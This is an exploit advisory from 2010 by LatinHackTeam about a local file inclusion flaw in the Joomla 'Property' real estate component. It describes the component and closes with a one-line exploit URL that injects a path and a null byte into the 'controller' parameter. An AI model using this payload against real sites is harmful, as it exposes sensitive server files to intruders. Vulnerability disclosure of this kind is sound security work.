---------------------------------------------------------------------------------
Joomla Component Property Local File Inclusion
---------------------------------------------------------------------------------

Author          : Chip D3 Bi0s
Group           : LatinHackTeam
Email & msn     : chipdebios[alt+64]gmail.com
Date            : 22 March 2010
Critical Lvl    : Moderate
Impact	        : Exposure of sensitive information
Where	        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application     : Property
Developer       : este8an
License         : GPL            type  : Non Commercial
Date Added	: 22 January 2009
Download	: http://www.com-property.com/download.html?func=select&id=2
Demo		: http://www.com-property.com/

Description     :

Property is a new Real Estate component 100% FREE native Joomla 1.5.
compatible with sh404sef and joomfish.

Add Profiles (Agent data: Client is a user joomla registered)
Can change permissions in User Manager to 'Agent' , then this
user can publish various properties.

Control Panel
button Create Menus automatically creates menus in FrontEnd :
All Properties,
My Short List(Favorites),
My Panel(to publish properties),
My Profile.

You can change names after created.
---------------------------------------------------------------------------
how to exploit

http://localhost/index.php?option=com_properties&controller=[LFI]%00


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++